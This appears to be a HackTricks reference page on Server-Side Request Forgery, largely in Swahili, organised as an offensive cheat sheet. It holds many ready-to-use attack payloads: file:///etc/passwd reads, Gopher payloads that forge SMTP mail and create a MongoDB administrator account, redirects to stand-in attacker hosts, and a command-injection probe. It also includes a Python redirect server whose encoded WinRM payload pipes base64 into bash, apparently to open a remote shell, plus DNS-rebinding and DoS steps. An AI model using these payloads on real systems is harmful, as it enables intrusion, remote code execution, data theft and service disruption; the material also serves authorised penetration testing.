SSRF (Server Side Request Forgery)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Udhaifu wa Server-side Request Forgery (SSRF) hutokea wakati mshambulizi anavyotumia programu ya upande wa server kufanya HTTP requests kwa domain anayotaka. Udhaifu huu unaweka server katika hatari ya kupokea maombi ya nje yanayoelekezwa na mshambulizi.

Kukamata SSRF

Jambo la kwanza unalopaswa kufanya ni kumnasa mwingiliano wa SSRF uliotengenezwa na wewe. Ili kumnasa mwingiliano wa HTTP au DNS unaweza kutumia zana kama:

• Burp Collaborator
• pingb
• canarytokens
• interractsh
• http://webhook.site
• https://github.com/teknogeek/ssrf-sheriff
• http://requestrepo.com/
• https://github.com/stolenusername/cowitness
• https://github.com/dwisiswant0/ngocok - A Burp Collaborator using ngrok

Whitelisted Domains Bypass

Kawaida utagundua kwamba SSRF inafanya kazi tu kwa domain maalum zilizowekwa kwenye whitelist au URL. Ukurasa ufuatao una mkusanyiko wa mbinu za kujaribu kupitisha whitelist hiyo:

URL Format Bypass

Bypass via open redirect

Iwapo server imekingwa vizuri unaweza kupitisha vikwazo vyote kwa kutumia Open Redirect ndani ya ukurasa wa wavuti. Kwa sababu ukurasa wa wavuti utaruhusu SSRF kwa domain ile ile na pengine utafuata redirects, unaweza kutumia Open Redirect ili kufanya server ifikie rasilimali yoyote ya ndani.
Read more here: https://portswigger.net/web-security/ssrf

Protokoli

• file://
• Magezo ya URL file:// yameonyeshwa, yanayorejelea moja kwa moja /etc/passwd: file:///etc/passwd
• dict://
• Magezo ya URL ya DICT inaelezewa kutumika kwa kufikia maana au orodha za maneno kupitia protokoli ya DICT. Mfano uliotolewa unaonyesha URL iliyojengwa inayolenga neno maalum, database, na nambari ya rekodi, pamoja na mfano wa script ya PHP inayoweza kutumika vibaya kuunganishwa na server ya DICT kwa kutumia uthibitisho uliotolewa na mshambulizi: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
• SFTP://
• Imetambuliwa kama protokoli ya uhamisho wa faili salama kupitia secure shell; mfano unaonyesha jinsi script ya PHP inaweza kutumika vibaya kuunganishwa na server ya SFTP yenye nia mbaya: url=sftp://generic.com:11111/
• TFTP://
• Trivial File Transfer Protocol, inayofanya kazi juu ya UDP, imetatuliwa na mfano wa script ya PHP iliyoundwa kutuma ombi kwa server ya TFTP. Ombi la TFTP limefanywa kwa ‘generic.com’ kwenye port ‘12346’ kwa faili ‘TESTUDPPACKET’: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
• LDAP://
• Sehemu hii inahusu Lightweight Directory Access Protocol, ikibainisha matumizi yake katika kusimamia na kufikia huduma za habari za directory zilizoenea kupitia mitandao ya IP. Inavyoonekana, unaweza kuingiliana na LDAP server kwenye localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
• SMTP
• Inabainishwa njia ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikijumuisha hatua za kufichua majina ya domain ya ndani na hatua za ziada za uchunguzi kulingana na taarifa hiyo.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

• Curl URL globbing - WAF bypass
• Ikiwa SSRF inatekelezwa kwa kutumia curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kusaidia bypass WAFs. Kwa mfano, katika hii writeup unaweza kupata mfano huu wa path traversal via file protocol:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

• Gopher://
• Uwezo wa Gopher protokoli wa kubainisha IP, port, na bytes kwa mawasiliano ya server unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa kuunda payloads. Matumizi mawili tofauti yanaonyeshwa:

Gopher://

Ukikitumia protokoli hii unaweza kubainisha IP, port and bytes unayotaka server kutuma. Kisha, kwa msingi unaweza kutumia SSRF ili kuwasiliana na server yoyote ya TCP (lakini unatakiwa kujua jinsi ya kuzungumza na service kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kuunda payloads kwa services kadhaa. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa Java RMI services.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Unganisha nyuma kwa 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB – Unda mtumiaji mwenye username=admin, password=admin123 na permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF kupitia Referrer header & Nyingine

Programu za analytics kwenye server mara nyingi zinarekodi Referrer header ili kufuatilia viungo vinavyoingia, desturi inayofichua kwa bahati mbaya programu kwa uhaifu wa Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu hizo zinaweza kutembelea URL za nje zilizotajwa katika Referrer header ili kuchambua yaliyomo kwenye tovuti ya referral. Ili kugundua uhaifu huu, Burp Suite plugin “Collaborator Everywhere” inapendekezwa, ikitumia jinsi zana za analytics zinavyoshughulikia Referer header ili kubaini maeneo yanayoweza kushambuliwa kwa SSRF.

SSRF via SNI data from certificate

Mkonfigurasio mbaya ambayo inaweza kuwezesha kuunganishwa kwa backend yoyote kupitia usanidi rahisi umeonyeshwa kwa mfano wa Nginx configuration:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika usanidi huu, thamani kutoka kwa uwanja wa Server Name Indication (SNI) inatumiwa moja kwa moja kama anwani ya backend. Mpangilio huu unaonyesha udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kutaja tu anwani ya IP au jina la kikoa unalotaka katika uwanja wa SNI. Mfano wa matumizi ya udhaifu ili kulazimisha muunganisho kwa backend yoyote, kama internal.host.com, kwa kutumia amri ya openssl umeonyeshwa hapa chini:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF kupitia TLS AIA CA Issuers (Java mTLS)

Baadhi ya TLS stacks zitaweka kiotomatiki intermediate CAs zilizokosekana kwa kutumia Authority Information Access (AIA) → CA Issuers URI ndani ya cheti cha peer. Katika Java, kuwezesha -Dcom.sun.security.enableAIAcaIssuers=true wakati wa kuendesha huduma ya mTLS hufanya server kufuatilia (dereference) URI zinazoendeshwa na attacker kutoka kwenye client certificate wakati wa handshake, kabla ya loji yoyote ya HTTP kuanza.

• Requirements: mTLS imewezesha, Java AIA fetching imewezeshwa, attacker anaweza kuwasilisha client cert yenye AIA CA Issuers URI iliyotengenezwa.
• Triggering SSRF (Java 21 example):

java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

Matokeo ya debug ya Java certpath yanaonyesha CertStore URI:http://localhost:8080, na nc inakamata ombi la HTTP lenye User-Agent linaloweza kudhibitiwa kutoka -Dhttp.agent, ikithibitisha SSRF wakati wa uthibitishaji wa cheti.

• DoS via file://: kuweka AIA CA Issuers kuwa file:///dev/urandom kwenye host zinazofanana na Unix kunafanya Java kuiitikia kama CertStore na kusoma bytes za nasibu zisizo na kikomo, kuifanya core ya CPU kufanya kazi na kuzuia muunganisho ufuatao hata baada ya client kutengana.

SSRF kupitia CSS Pre-Processors

LESS ni CSS pre-processor maarufu ambayo inaongeza variables, mixins, functions na directive yenye nguvu ya @import. Wakati wa compilation engine ya LESS itafanya fetch the resources referenced in @import statements na kuingiza (“inline”) yaliyomo ndani ya CSS inayotokana wakati chaguo la (inline) linatumiwa.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF na Command Injection

Inaweza kuwa vyema kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

Uundaji wa PDFs

Ikiwa ukurasa wa wavuti unatengeneza PDF moja kwa moja ukitumia baadhi ya taarifa ulizotoa, unaweza kuingiza baadhi ya JS ambayo itatekelezwa na mtoaji wa PDF mwenyewe (server) wakati wa kuunda PDF na utakuwa na uwezo wa kutumia SSRF. Find more information here.

Kutoka SSRF hadi DoS

Tengeneza sessions kadhaa na ujaribu kupakua faili nzito ukiitumia SSRF kutoka kwa sessions hizo.

SSRF PHP Functions

Angalia ukurasa ufuatao kwa PHP na hata Wordpress functions zilizo dhaifu:

PHP SSRF

SSRF Redirect to Gopher

Kwa baadhi ya matumizi ya udhaifu unaweza kuhitaji kutuma redirect response (kwa lengo la kutumia protocol tofauti kama gopher). Hapa kuna codes tofauti za python za kujibu na redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Proksi zilizopangwa vibaya kwa SSRF

Mbinu from this post.

Flask

Flask proxy code iliyo dhaifu

```python from flask import Flask from requests import get

app = Flask(‘main’) SITE_NAME = ‘https://google.com’

@app.route(‘/’, defaults={‘path’: ‘’}) @app.route(‘/path:path’)

def proxy(path): return get(f’{SITE_NAME}{path}’).content

if name == “main”: app.run(threaded=False)

</details>

Flask inaruhusu kutumia **`@`** kama tabia ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji la awali kuwa jina la mtumiaji** na kuingiza jipya. Attack request:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Kanuni zilizo dhaifu:

Iligundulika kuwa inawezekana kuanza path ya ombi kwa herufi ;, jambo linaloruhusu kisha kutumia @ na kuingiza host mpya ili kufikiwa. Ombi la shambulio:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server

Msimbo dhaifu wa PHP

```php

$proxy_site = $site.$current_uri; var_dump($proxy_site);

echo “\n\n”;

$response = file_get_contents($proxy_site); var_dump($response); ?>

</details>

PHP inaruhusu kutumia char `*` kabla ya slash katika path ya URL, lakini ina vikwazo vingine: inaweza kutumika tu kwa pathname ya mizizi `/` na nukta `.` haziruhusiwi kabla ya slash ya kwanza, hivyo inahitajika kutumia anwani ya IP iliyokodishwa kwa hex bila nukta, kwa mfano:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

DNS Rebidding CORS/SOP bypass

Ikiwa unapata matatizo kujaribu exfiltrate content from a local IP kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kuepuka kikomo hicho:

CORS - Misconfigurations & Bypass

DNS Rebidding ya Kiotomatiki

Singularity of Origin ni zana ya kutekeleza mashambulizi ya DNS rebinding. Inajumuisha vipengele vinavyohitajika kubadilisha anwani ya IP ya jina la DNS la attack server hadi anwani ya IP ya mashine lengwa na kuhudumia attack payloads ili exploit vulnerable software kwenye mashine lengwa.

Angalia pia server inayotumika hadharani katika http://rebind.it/singularity.html

DNS Rebidding + TLS Session ID/Session ticket

Mahitaji:

• SSRF
• Outbound TLS sessions
• Stuff on local ports

Shambulio:

1. Muombe mtumiaji/bot kuingia kwenye domain inayodhibitiwa na attacker
2. TTL ya DNS ni 0 sec (hivyo mwenyehatari ataangalia IP ya domain tena hivi karibuni)
3. Muunganisho wa TLS unaanzishwa kati ya mhusika mwenyehatari na domain ya attacker. Attacker anaingiza payload inside the Session ID or Session Ticket.
4. Domain itaanza infinite loop ya redirects dhidi ya yeye mwenyewe. Lengo la hili ni kumfanya mtumiaji/bot aende kwenye domain hadi itafanya again DNS request ya domain.
5. Katika ombi la DNS anwani ya private IP inatolewa now (127.0.0.1 kwa mfano)
6. Mtumiaji/bot atajaribu reestablish the TLS connection na ili kufanya hivyo atatuma Session ID/Ticket ID (ambapo payload ya attacker ilikuwa imehifadhiwa). Hivyo hongera — umefanikiwa kumuomba user/bot attack himself.

Kumbuka kwamba wakati wa shambulio hili, ikiwa unataka kushambulia localhost:11211 (memcache) unatakiwa kumfanya mhusika aanzishe muunganisho wa awali na www.attacker.com:11211 (the port must always be the same).
Ili kutekeleza shambulio hili unaweza kutumia zana: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi angalia mazungumzo ambapo shambulio hili limeelezewa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

Tofauti kati ya blind SSRF na SSRF isiyo-blind ni kwamba katika blind SSRF huwezi kuona jibu la ombi la SSRF. Hivyo, ni vigumu zaidi ku-exploit kwa sababu utaweza ku-exploit tu vulnerabilities zinazojulikana vizuri.

Time based SSRF

Kuangalia muda wa majibu kutoka kwa server kunaweza kuwa inawezekana kujua kama rasilimali ipo au la (labda inachukua muda zaidi kufikia rasilimali iliyopo kuliko kufikia ile isiyopo)

From blid to full abusing status codes

Kulingana na hii blog post, baadhi ya blind SSRF zinaweza kutokea kwa sababu hata kama URL lengwa inajibu na 200 status code (kama AWS metadata), data hiyo haifomatiwi vizuri na kwa hivyo app inaweza kukataa kuionyesha.

Hata hivyo, imegundulika kwamba kutuma baadhi ya majibu ya redirects kutoka 305 hadi 309 katika SSRF kunaweza kufanya application ifuate these redirects while entering an error mode ambayo haitacheki tena fomati ya data na inaweza kuionyesha tu.

Server ya python inayotumika ku-exploit hili ni ifuatayo:

@app.route("/redir")
def redir():
count = int(request.args.get("count", 0)) + 1
# Pump out 305, 306, 307, 308, 309, 310 ...
weird_status = 301 + count
if count >= 10:                      # after 5 “weird” codes
return redirect(METADATA_URL, 302)
return redirect(f"/redir?count={count}", weird_status)

@app.route("/start")
def start():
return redirect("/redir", 302)

Hatua:

• Kwanza 302 inafanya app kuanza kufuata.
• Kisha inapokea 305 → 306 → 307 → 308 → 309 → 310.
• Baada ya msimbo wa tano wa ajabu PoC hatimaye inarejesha 302 → 169.254.169.254 → 200 OK.

Nini kinaendelea ndani ya target:

• libcurl yenyewe hufuata 305–310; huweka tu codes zisizojulikana kama “follow.”
• Baada ya N redirects za ajabu (≥ 5 hapa) wrapper ya application mwenyewe inaamua “something is off” na inabadilisha hadi error mode iliyokusudiwa kwa debugging.
• Katika mode hiyo inadumps mnyororo mzima wa redirect pamoja na body ya mwisho kurudi kwa caller wa nje.
• Matokeo: attacker anaona every header + JSON ya metadata, lengo limefikiwa.

Note kwamba hili ni interesting ili leak status codes ambazo haukuweza leak hapo awali (kama 200). Hata hivyo, ikiwa kwa namna fulani unaweza pia kuchagua status code ya response (taswira kwamba unaweza kuamua kwamba AWS metadata inarejea na status code 500), kunaweza kuwa baadhi ya status codes ambazo zinaleak moja kwa moja content ya response.

HTML-to-PDF renderers kama blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>

• TCPDF 6.10.0 inatoa majaribio kadhaa ya upakaji kwa kila rasilimali <img>, hivyo payload moja inaweza kuzalisha maombi mingi (helpful for timing-based port scans).
• html2pdf huiga tabia ya TCPDF kwa <img> na inaongeza upakuaji wa CSS ndani ya Css::extractStyle(), ambayo inaita tu file_get_contents($href) baada ya ukaguzi mdogo wa scheme. Tumia vibaya hili ili kufikia loopback services, RFC1918 ranges, au cloud metadata endpoints.
• Unganisha SSRF primitive hii na HTML-to-PDF path traversal tricks ili leak majibu ya HTTP ya ndani na faili za ndani zilizochorwa katika PDF.

Wanafanya hardening wanapaswa kuondoa external URLs kabla ya rendering au kutenga renderer ndani ya network sandbox; hadi wakati huo, chukulia PDF generators kama blind SSRF proxies.

Cloud SSRF Exploitation

Ikiwa utapata udhaifu wa SSRF kwenye mashine inayoendesha ndani ya cloud environment, unaweza kupata taarifa za kuvutia kuhusu cloud environment na hata credentials:

Cloud SSRF

SSRF Vulnerable Platforms

Mifumo kadhaa inayojulikana ina au imewahi kuwa na udhaifu wa SSRF; angalia hizo katika:

SSRF Vulnerable Platforms

Tools

SSRFMap

Zana ya kugundua na ku-exploit udhaifu za SSRF

Gopherus

• Blog post on Gopherus

Zana hii inazalisha Gopher payloads kwa:

• MySQL
• PostgreSQL
• FastCGI
• Redis
• Zabbix
• Memcache

remote-method-guesser

• Blog post on SSRF usage

remote-method-guesser ni skana ya udhaifu ya Java RMI ambayo inaunga mkono operesheni za attack kwa udhaifu nyingi za kawaida za Java RMI. Operesheni nyingi zinazopatikana zinaunga mkono chaguo --ssrf ili kuunda SSRF payload kwa operesheni iliyotakiwa. Pamoja na chaguo --gopher, gopher payloads tayari kwa matumizi zinaweza kuzalishwa moja kwa moja.

SSRF Proxy

SSRF Proxy ni multi-threaded HTTP proxy server iliyobuniwa kutunnel trafiki ya HTTP ya mteja kupitia HTTP servers zilizo na udhaifu wa Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack

Marejeo

• https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
• https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
• https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
• Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
• Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk
• RFC 5280 §4.2.2.1 Authority Information Access

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
